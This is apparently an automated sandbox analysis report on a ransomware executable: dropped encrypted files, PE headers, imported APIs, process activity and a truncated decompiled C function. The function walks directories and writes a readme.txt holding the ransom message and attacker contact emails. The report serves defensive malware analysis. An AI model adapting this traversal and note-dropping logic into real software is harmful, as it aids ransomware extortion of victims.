                                                            C:\Users\user\AppData\Local\Temp\{530415C5-2B45-4B70-85E3-40C804FDC326}.png
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):5796
                                                            Entropy (8bit):7.8707072980628645
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:00E5FCFD833151F7CBDE607E2F7AFEB4
                                                            SHA1:55839875C0947AAFEBFF53D22CCC5DAD29FE3563
                                                            SHA-256:B80192AAABE007BAECD0603E3CE183E9D554B8A6B0411D20716ACFA086AE3035
                                                            SHA-512:F056777A1987C3BECDC217BDC2D82E6AA41086D38FDDAA45C42F1726B6F7B7616A10918081650E825A724464EF148B669BC258D38A62E0DE8642E2607A0B0DE7
                                                            Malicious:false
                                                            Preview:
                                                            C:\bootTel.dat
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):80
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D1D9ABE750525B2B6C74A5291F52BAA7
                                                            SHA1:2D5D85DFD3361150E8BEBE7CB730C08258206BA6
                                                            SHA-256:D9B1F3E2C6D528668A73F22575C44ED9F98D9C684964761B621417EFD80D7A60
                                                            SHA-512:B2BF8578EEAB1AAEEE7E51DB684ECCFDF2AD7048142E47A01646D26A3137528D0721362456A1333630F9ED7B61EC8A9B1F4EF2C40C35DEFFBEA635ACBE170B07
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\bootTel.dat.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):376
                                                            Entropy (8bit):7.326471208441697
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:FCA918B74259192D685871D88186683C
                                                            SHA1:7FD59AF94921C07BBB17407F10263FEDEB6F3D90
                                                            SHA-256:877A2EFDCE5306D8592380A0C8669BC3B23B3EF440FE260F841F82FD7E1ADB67
                                                            SHA-512:C09FDD8CBDEE1F5EEB11090EEA55FA05B8B0DD120E476BABEBCB524A9E50AD10E3B06083B1D78AC4860AF1DCFB8E507C0ACA899CC96B1946A6C1F3413B3CC976
                                                            Malicious:false
                                                            Preview: DEARCRY!....;.;....g.%<..Q.K...yF.OG.....<m.....BdSB....b.;`.UJ......!V.y..t{......I|yO+..../.a.M!.l.xT.*....!b.B..U....d...6`...R]..`...b:.....\y....XB7...."3.|Uy...C...^H.79....fG..~.0...$Z....bK...Uci..$9`..Gm....4.}..h3...t..........u....^..5i..zyK ~....P........6j..@...3..Z..)..B.............O.0.....N6......I ..X.....8%G..M.9%G.0...`v.o.....f.Cn

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (console) Intel 80386, for MS Windows
                                                            Entropy (8bit):6.994272279602838
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:bkscEXd86b.exe
                                                            File size:1322496
                                                            MD5:cdda3913408c4c46a6c575421485fa5b
                                                            SHA1:56eec7392297e7301159094d7e461a696fe5b90f
                                                            SHA256:e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6
                                                            SHA512:666b7419adaa2fba34e53416fc29cac92bbbe36d9fae57bae00001d644f35484df9b1e44a516866b000b8ab04cd2241414fe0692e1a5b6f36d540ed13a45448a
                                                            SSDEEP:24576:C5Nv2SkWFP/529IC8u2bAs0NIzkQS+KpPbEasBY2iKDl1fpxkLVZgMCS+:oB70s9yjE62iIl1fpxkLVZgMC3
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>...m...m...m..dm...m..um...m..cm...m...m...m.:.m...m...m...m..jm...m..qm...mRich...m........................PE..L...1.E`...

                                                            File Icon

                                                            Icon Hash:00828e8e8686b000

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x4db796
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows cui
                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                            DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                            Time Stamp:0x6045C431 [Mon Mar 8 06:29:05 2021 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:0
                                                            File Version Major:5
                                                            File Version Minor:0
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:0
                                                            Import Hash:f8b8e20e844ccd50a8eb73c2fca3626d

                                                            Entrypoint Preview

                                                            Instruction
                                                            call 00007F9C5888D069h
                                                            jmp 00007F9C58883149h
                                                            push ebp
                                                            mov ebp, esp
                                                            push edi
                                                            push esi
                                                            mov esi, dword ptr [ebp+0Ch]
                                                            mov ecx, dword ptr [ebp+10h]
                                                            mov edi, dword ptr [ebp+08h]
                                                            mov eax, ecx
                                                            mov edx, ecx
                                                            add eax, esi
                                                            cmp edi, esi
                                                            jbe 00007F9C588832AAh
                                                            cmp edi, eax
                                                            jc 00007F9C5888344Ah
                                                            cmp ecx, 00000100h
                                                            jc 00007F9C588832C1h
                                                            cmp dword ptr [0073C7A4h], 00000000h
                                                            je 00007F9C588832B8h
                                                            push edi
                                                            push esi
                                                            and edi, 0Fh
                                                            and esi, 0Fh
                                                            cmp edi, esi
                                                            pop esi
                                                            pop edi
                                                            jne 00007F9C588832AAh
                                                            pop esi
                                                            pop edi
                                                            pop ebp
                                                            jmp 00007F9C5888D13Ah
                                                            test edi, 00000003h
                                                            jne 00007F9C588832B7h
                                                            shr ecx, 02h
                                                            and edx, 03h
                                                            cmp ecx, 08h
                                                            jc 00007F9C588832CCh
                                                            rep movsd
                                                            jmp dword ptr [004DB914h+edx*4]
                                                            nop
                                                            mov eax, edi
                                                            mov edx, 00000003h
                                                            sub ecx, 04h
                                                            jc 00007F9C588832AEh
                                                            and eax, 03h
                                                            add ecx, eax
                                                            jmp dword ptr [004DB828h+eax*4]
                                                            jmp dword ptr [004DB924h+ecx*4]
                                                            nop
                                                            jmp dword ptr [004DB8A8h+ecx*4]
                                                            nop
                                                            cmp byte ptr [eax-479BFFB3h], bh
                                                            dec ebp
                                                            add byte ptr [eax+23004DB8h], cl
                                                            ror dword ptr [edx-75F877FAh], 1
                                                            inc esi
                                                            add dword ptr [eax+468A0147h], ecx
                                                            add al, cl
                                                            jmp 00007F9C5ACFBAA7h
                                                            add esi, 03h
                                                            add edi, 03h
                                                            cmp ecx, 08h
                                                            jc 00007F9C5888326Eh
                                                            rep movsd
                                                            jmp dword ptr [00000014h+edx*4]

                                                            Rich Headers

                                                            Programming Language:
                                                            • [ C ] VS2008 build 21022
                                                            • [IMP] VS2005 build 50727
                                                            • [LNK] VS2008 build 21022
                                                            • [C++] VS2008 build 21022
                                                            • [ASM] VS2008 build 21022

                                                            Data Directories

                                                            Name | Virtual Address | Virtual Size | Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x13009c | 0x78 | .rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x33e000 | 0x1b4 | .rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x33f000 | 0x9164 | .reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0xf0290 | 0x1c | .rdata
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x12f898 | 0x40 | .rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IAT | 0xf0000 | 0x24c | .rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                            Sections

                                                            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                            .text | 0x1000 | 0xee662 | 0xee800 | False | 0.569355386858 | data | 7.0691412793 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                            .rdata | 0xf0000 | 0x40df6 | 0x40e00 | False | 0.500060211946 | data | 6.12897231389 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data | 0x131000 | 0x20c904 | 0x6600 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                            .rsrc | 0x33e000 | 0x1b4 | 0x200 | False | 0.48828125 | data | 5.10871729953 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc | 0x33f000 | 0xc94e | 0xca00 | False | 0.44395884901 | data | 5.47413035767 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            Name | RVA | Size | Type | Language | Country
                                                            RT_MANIFEST | 0x33e058 | 0x15a | ASCII text, with CRLF line terminators | English | United States

                                                            Imports

                                                            DLL | Import
                                                            KERNEL32.dll | GetCurrentProcessId, CloseHandle, LoadLibraryA, VirtualAlloc, GetProcAddress, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InterlockedCompareExchange, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetCurrentThreadId, InterlockedExchangeAdd, GetModuleHandleW, GetVersion, MultiByteToWideChar, WriteFile, GetFileType, GetStdHandle, GetSystemTimeAsFileTime, DeleteFiber, GetTickCount, QueryPerformanceCounter, GlobalMemoryStatus, WideCharToMultiByte, ConvertFiberToThread, GetConsoleMode, SetConsoleMode, ReadConsoleA, ReadConsoleW, GetEnvironmentVariableW, LoadLibraryW, HeapFree, FileTimeToSystemTime, FileTimeToLocalFileTime, GetLastError, DeleteFileA, Sleep, ExitProcess, GetCommandLineA, HeapReAlloc, SetConsoleCtrlHandler, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, GetFullPathNameA, GetCurrentDirectoryA, GetModuleFileNameA, SetHandleCount, GetStartupInfoA, SetFilePointer, ReadFile, RtlUnwind, GetConsoleCP, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, SetLastError, LCMapStringA, LCMapStringW, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetModuleHandleA, FlushFileBuffers, SetStdHandle, HeapSize, GetTimeZoneInformation, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, CompareStringA, CompareStringW, SetEnvironmentVariableA, CreateFileW, SetEndOfFile, GetProcessHeap, VirtualFree, GetCurrentProcess, FreeLibrary, CreateFileA, FindNextFileA, FindClose, GetLogicalDriveStringsA, FindFirstFileA, lstrcatA, GetFileAttributesA, GetDriveTypeA, GetLogicalDrives, HeapAlloc, lstrcpynA
                                                            ADVAPI32.dll | OpenServiceA, CryptDecrypt, CryptCreateHash, CryptSetHashParam, CryptSignHashW, CryptDestroyHash, CryptExportKey, CryptGetUserKey, CryptGetProvParam, CryptDestroyKey, CryptEnumProvidersW, CryptAcquireContextW, CryptGenRandom, CryptReleaseContext, RegisterEventSourceW, ReportEventW, DeregisterEventSource, CloseServiceHandle, StartServiceCtrlDispatcherA, DeleteService, RegisterServiceCtrlHandlerA, SetServiceStatus, OpenSCManagerA
                                                            WS2_32.dll | closesocket, recv, WSASetLastError, send, WSAGetLastError, WSACleanup
                                                            USER32.dll | GetProcessWindowStation, MessageBoxW, GetUserObjectInformationW
                                                            CRYPT32.dll | CertCloseStore, CertFreeCertificateContext, CertEnumCertificatesInStore, CertFindCertificateInStore, CertOpenStore, CertGetCertificateContextProperty, CertDuplicateCertificateContext

                                                            Possible Origin

                                                            Language of compilation system | Country where language is spoken | Map
                                                            English | United States |

                                                            Network Behavior

                                                            UDP Packets

                                                            DNS Answers

                                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                            Mar 11, 2021 23:58:06.670023918 CET | 8.8.8.8 | 192.168.2.3 | 0xd03a | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.trafficmanager.net |  | CNAME (Canonical name) | IN (0x0001)
                                                            Mar 11, 2021 23:58:48.263914108 CET | 8.8.8.8 | 192.168.2.3 | 0x92c9 | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.trafficmanager.net |  | CNAME (Canonical name) | IN (0x0001)

                                                            Code Manipulations

                                                            System Behavior

                                                            General

                                                            Start time:23:56:55
                                                            Start date:11/03/2021
                                                            Path:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:'C:\Users\user\Desktop\bkscEXd86b.exe'
                                                            Imagebase:0xb90000
                                                            File size:1322496 bytes
                                                            MD5 hash:CDDA3913408C4C46A6C575421485FA5B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low

                                                            General

                                                            Start time:23:56:56
                                                            Start date:11/03/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6b2800000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:23:57:01
                                                            Start date:11/03/2021
                                                            Path:C:\Windows\System32\WerFault.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\WerFault.exe -pss -s 568 -p 3388 -ip 3388
                                                            Imagebase:0x7ff69c760000
                                                            File size:494488 bytes
                                                            MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            General

                                                            Start time:23:57:03
                                                            Start date:11/03/2021
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:
                                                            Imagebase:0x7ff714890000
                                                            File size:3933184 bytes
                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:23:57:12
                                                            Start date:11/03/2021
                                                            Path:C:\Windows\System32\WerFault.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\WerFault.exe -u -p 3388 -s 8972
                                                            Imagebase:0x7ff69c760000
                                                            File size:494488 bytes
                                                            MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            General

                                                            Start time:23:57:19
                                                            Start date:11/03/2021
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:explorer.exe
                                                            Imagebase:0x7ff714890000
                                                            File size:3933184 bytes
                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:23:57:41
                                                            Start date:11/03/2021
                                                            Path:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
                                                            Imagebase:0x7ff632eb0000
                                                            File size:13606304 bytes
                                                            MD5 hash:C4A9ACE9CDB9E5DB7CBA996CFA9EA7A2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            General

                                                            Start time:23:58:13
                                                            Start date:11/03/2021
                                                            Path:C:\Windows\System32\OpenWith.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                                            Imagebase:0x7ff746c60000
                                                            File size:111120 bytes
                                                            MD5 hash:D179D03728E95E040A889F760C1FC402
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            General

                                                            Start time:23:58:44
                                                            Start date:11/03/2021
                                                            Path:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
                                                            Imagebase:0x7ff632eb0000
                                                            File size:13606304 bytes
                                                            MD5 hash:C4A9ACE9CDB9E5DB7CBA996CFA9EA7A2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            Disassembly

                                                            Code Analysis

                                                              Executed Functions

                                                              C-Code - Quality: 78%
                                                              			E00B91640(char** _a4, intOrPtr* _a8, char** _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                              				long _v8;
                                                              				signed int _v12;
                                                              				char _v20;
                                                              				intOrPtr _v28;
                                                              				signed int _v32;
                                                              				char _v84;
                                                              				char _v1388;
                                                              				char _v2692;
                                                              				char _v3996;
                                                              				char _v5299;
                                                              				char _v5300;
                                                              				struct _WIN32_FIND_DATAA _v5620;
                                                              				char _v5621;
                                                              				intOrPtr _v5628;
                                                              				intOrPtr _v5632;
                                                              				char** _v5636;
                                                              				void* _v5644;
                                                              				intOrPtr* _v5648;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				signed int _t119;
                                                              				signed int _t120;
                                                              				intOrPtr* _t126;
                                                              				int _t130;
                                                              				intOrPtr* _t133;
                                                              				char** _t134;
                                                              				intOrPtr* _t135;
                                                              				signed int _t143;
                                                              				intOrPtr* _t144;
                                                              				char** _t146;
                                                              				char** _t147;
                                                              				char** _t152;
                                                              				char** _t153;
                                                              				intOrPtr* _t154;
                                                              				char** _t155;
                                                              				char* _t158;
                                                              				char** _t159;
                                                              				char _t162;
                                                              				intOrPtr* _t163;
                                                              				char** _t166;
                                                              				intOrPtr* _t167;
                                                              				intOrPtr* _t169;
                                                              				intOrPtr* _t173;
                                                              				intOrPtr* _t175;
                                                              				intOrPtr* _t178;
                                                              				void* _t180;
                                                              				intOrPtr* _t181;
                                                              				intOrPtr* _t183;
                                                              				void* _t187;
                                                              				intOrPtr* _t192;
                                                              				char _t196;
                                                              				intOrPtr* _t197;
                                                              				intOrPtr* _t199;
                                                              				void* _t202;
                                                              				intOrPtr _t206;
                                                              				intOrPtr _t212;
                                                              				char** _t213;
                                                              				char** _t215;
                                                              				char** _t216;
                                                              				char** _t218;
                                                              				char* _t219;
                                                              				char* _t220;
                                                              				char** _t221;
                                                              				char** _t223;
                                                              				intOrPtr _t225;
                                                              				char** _t226;
                                                              				intOrPtr _t227;
                                                              				intOrPtr _t228;
                                                              				intOrPtr _t229;
                                                              				intOrPtr _t231;
                                                              				intOrPtr _t232;
                                                              				void* _t234;
                                                              				void* _t236;
                                                              				void* _t237;
                                                              				char* _t241;
                                                              				void* _t244;
                                                              				void* _t245;
                                                              				void* _t248;
                                                              				void* _t249;
                                                              				void* _t251;
                                                              				void* _t252;
                                                              				void* _t253;
                                                              				void* _t254;
                                                              				char** _t255;
                                                              				signed int _t256;
                                                              				char** _t258;
                                                              				char** _t259;
                                                              				void* _t260;
                                                              				void* _t261;
                                                              				intOrPtr* _t265;
                                                              				void* _t266;
                                                              				signed int _t267;
                                                              				void* _t268;
                                                              				intOrPtr _t269;
                                                              				void* _t271;
                                                              				void* _t272;
                                                              				void* _t275;
                                                              				void* _t276;
                                                              				void* _t277;
                                                              				void* _t278;
                                                              
                                                              				_push(0xfffffffe);
                                                              				_push(0xcc0080);
                                                              				_push(0xc708a0);
                                                              				_push( *[fs:0x0]);
                                                              				_t269 = _t268 - 8;
                                                              				E00C6BB10(0x15f8);
                                                              				_t119 =  *0xcc5970; // 0x851ab4dd
                                                              				_v12 = _v12 ^ _t119;
                                                              				_t120 = _t119 ^ _t267;
                                                              				_v32 = _t120;
                                                              				_push(_t201);
                                                              				_push(_t251);
                                                              				_push(_t120);
                                                              				 *[fs:0x0] =  &_v20;
                                                              				_v28 = _t269;
                                                              				_v5636 = _a4;
                                                              				_t265 = _a8;
                                                              				_v5648 = _t265;
                                                              				_v5628 = _a20;
                                                              				_v5632 = _a24;
                                                              				_v5620.dwFileAttributes = 0;
                                                              				E00C6BB40(_t251,  &(_v5620.ftCreationTime), 0, 0x13c);
                                                              				_v5300 = 0;
                                                              				E00C6BB40(_t251,  &_v5299, 0, 0x513);
                                                              				_t271 = _t269 + 0x18;
                                                              				_v5621 = 1;
                                                              				_t126 = _t265;
                                                              				_t234 = _t126 + 1;
                                                              				do {
                                                              					_t206 =  *_t126;
                                                              					_t126 = _t126 + 1;
                                                              				} while (_t206 != 0);
                                                              				if( *((char*)(_t265 + _t126 - _t234 - 1)) == 0x5c) {
                                                              					L7:
                                                              					_push("*.*");
                                                              					_push(_t265);
                                                              					_push("%s%s");
                                                              					_push( &_v5300);
                                                              					L8:
                                                              					E00C69C35(_t251, _t265);
                                                              					_t272 = _t271 + 0x10;
                                                              					_t207 =  &_v5620;
                                                              					_t235 =  &_v5300;
                                                              					_t130 = FindFirstFileA( &_v5300,  &_v5620); // executed
                                                              					_v5644 = _t130;
                                                              					if(_t130 == 0xffffffff) {
                                                              						L86:
                                                              						 *[fs:0x0] = _v20;
                                                              						_pop(_t252);
                                                              						_pop(_t266);
                                                              						_pop(_t202);
                                                              						return E00C69C26(_t130, _t202, _v32 ^ _t267, _t235, _t252, _t266);
                                                              					} else {
                                                              						goto L9;
                                                              					}
                                                              					do {
                                                              						L9:
                                                              						if((_v5620.dwFileAttributes & 0x00000010) != 0) {
                                                              							__eflags = _v5620.cFileName - 0x2e;
                                                              							if(_v5620.cFileName == 0x2e) {
                                                              								goto L83;
                                                              							}
                                                              							_t133 = _t265;
                                                              							_t237 = _t133 + 1;
                                                              							do {
                                                              								_t213 =  *_t133;
                                                              								_t133 = _t133 + 1;
                                                              								__eflags = _t213;
                                                              							} while (_t213 != 0);
                                                              							_t134 = _t133 - _t237;
                                                              							__eflags = _t134;
                                                              							_t235 = _t134;
                                                              							_t135 =  &(_v5620.cFileName);
                                                              							_t75 = _t135 + 1; // 0x2f
                                                              							_t254 = _t75;
                                                              							do {
                                                              								_t207 =  *_t135;
                                                              								_t135 = _t135 + 1;
                                                              								__eflags = _t207;
                                                              							} while (_t207 != 0);
                                                              							__eflags = _t135 - _t254 + _t235 - 0x514;
                                                              							if(_t135 - _t254 + _t235 >= 0x514) {
                                                              								goto L83;
                                                              							}
                                                              							E00C6BB40(_t254,  &_v3996, 0, 0x514);
                                                              							E00C6BB40(_t254,  &_v1388, 0, 0x514);
                                                              							_push( &(_v5620.cFileName));
                                                              							E00C69C35(_t254, _t265,  &_v3996, "%s%s", _t265);
                                                              							_t272 = _t272 + 0x28;
                                                              							_t143 = 0;
                                                              							do {
                                                              								_t215 =  *((intOrPtr*)(_t267 + _t143 - 0xf98));
                                                              								 *((char*)(_t267 + _t143 - 0x568)) = _t215;
                                                              								_t143 = _t143 + 1;
                                                              								__eflags = _t215;
                                                              							} while (_t215 != 0);
                                                              							_t255 = 0;
                                                              							__eflags = 0;
                                                              							_t144 =  &_v1388;
                                                              							_t235 = _t144 + 1;
                                                              							do {
                                                              								_t216 =  *_t144;
                                                              								_t144 = _t144 + 1;
                                                              								__eflags = _t216;
                                                              							} while (_t216 != 0);
                                                              							__eflags = _t144 == _t235;
                                                              							if(_t144 == _t235) {
                                                              								L65:
                                                              								_t256 = 0;
                                                              								__eflags =  *0xec9fb0;
                                                              								if( *0xec9fb0 == 0) {
                                                              									L71:
                                                              									_t258 =  &_v3996 - 1;
                                                              									__eflags = _t258;
                                                              									do {
                                                              										_t146 = _t258[0];
                                                              										_t258 =  &(_t258[0]);
                                                              										__eflags = _t146;
                                                              									} while (_t146 != 0);
                                                              									_t207 = "\\"; // 0x5c
                                                              									 *_t258 = _t207;
                                                              									__eflags = _v5621 - _t146;
                                                              									if(_v5621 == _t146) {
                                                              										L82:
                                                              										_v5621 = 1;
                                                              										goto L83;
                                                              									}
                                                              									_t147 = E00C6A360( &_v1388, "DESKTOP");
                                                              									_t275 = _t272 + 8;
                                                              									__eflags = _t147;
                                                              									if(_t147 == 0) {
                                                              										L81:
                                                              										_t207 =  &_v3996;
                                                              										_t235 = _v5636;
                                                              										E00B91640(_v5636,  &_v3996, _a12, _a16, _v5628, _v5632); // executed
                                                              										_t272 = _t275 + 0x18;
                                                              										goto L82;
                                                              									}
                                                              									_t152 =  &_v1388 - 1;
                                                              									__eflags = _t152;
                                                              									do {
                                                              										_t218 = _t152[0];
                                                              										_t152 =  &(_t152[0]);
                                                              										__eflags = _t218;
                                                              									} while (_t218 != 0);
                                                              									_t219 = "/readme.txt"; // 0x6165722f
                                                              									 *_t152 = _t219;
                                                              									_t241 = M00CBF7C8; // 0x2e656d64
                                                              									_t152[1] = _t241;
                                                              									_t220 =  *0xcbf7cc; // 0x747874
                                                              									_t152[2] = _t220;
                                                              									_t153 = L00C6A96D( &_v1388, "w+"); // executed
                                                              									_t275 = _t275 + 8;
                                                              									_t259 = _t153;
                                                              									__eflags = _t259;
                                                              									if(_t259 == 0) {
                                                              										goto L81;
                                                              									}
                                                              									_t154 = 0xdc9fb0;
                                                              									do {
                                                              										_t221 =  *_t154;
                                                              										_t154 = _t154 + 1;
                                                              										__eflags = _t221;
                                                              									} while (_t221 != 0);
                                                              									_t155 = _t154 - 0xdc9fb1;
                                                              									__eflags = _t155;
                                                              									_push(_t259);
                                                              									_push(_t155);
                                                              									_push(1);
                                                              									_push("Your file has been encrypted!						 If you want to decrypt, please contact us.						 konedieyp@airmail.cc or uenwonken@memail.com						 And please send me the following hash!						 d37fc1eabc6783a418d23a8d2ba5db5a");
                                                              									E00C6ADA3(_t201, 0xdc9fb1, _t259, _t265, __eflags);
                                                              									_push(_t259); // executed
                                                              									E00C6B1A7(_t201, 0xdc9fb1, _t259, _t265, __eflags); // executed
                                                              									_t275 = _t275 + 0x14;
                                                              									goto L81;
                                                              								}
                                                              								_t158 = 0xec9fb0;
                                                              								while(1) {
                                                              									_t235 =  &_v1388;
                                                              									_t159 = E00C6A360( &_v1388, _t158);
                                                              									_t272 = _t272 + 8;
                                                              									__eflags = _t159;
                                                              									if(_t159 != 0) {
                                                              										break;
                                                              									}
                                                              									_t256 = _t256 + 1;
                                                              									_t158 = 0xec9fb0 + _t256 * 0xff;
                                                              									__eflags =  *_t158;
                                                              									if( *_t158 != 0) {
                                                              										continue;
                                                              									}
                                                              									goto L71;
                                                              								}
                                                              								_v5621 = 0;
                                                              								goto L71;
                                                              							}
                                                              							do {
                                                              								_t162 = E00C6AFFA( *((char*)(_t267 + _t255 - 0x568)));
                                                              								_t272 = _t272 + 4;
                                                              								 *((char*)(_t267 + _t255 - 0x568)) = _t162;
                                                              								_t255 =  &(_t255[0]);
                                                              								__eflags = _t255;
                                                              								_t163 =  &_v1388;
                                                              								_t235 = _t163 + 1;
                                                              								do {
                                                              									_t223 =  *_t163;
                                                              									_t163 = _t163 + 1;
                                                              									__eflags = _t223;
                                                              								} while (_t223 != 0);
                                                              								__eflags = _t255 - _t163 - _t235;
                                                              							} while (_t255 < _t163 - _t235);
                                                              							goto L65;
                                                              						}
                                                              						_t166 = E00C6AE30(_t207,  &(_v5620.cFileName), 0x2e);
                                                              						_t272 = _t272 + 8;
                                                              						_t201 = _t166;
                                                              						if(_t201 == 0) {
                                                              							goto L83;
                                                              						}
                                                              						_t167 = _t265;
                                                              						_t236 = _t167 + 1;
                                                              						do {
                                                              							_t212 =  *_t167;
                                                              							_t167 = _t167 + 1;
                                                              						} while (_t212 != 0);
                                                              						_t235 = _t167 - _t236;
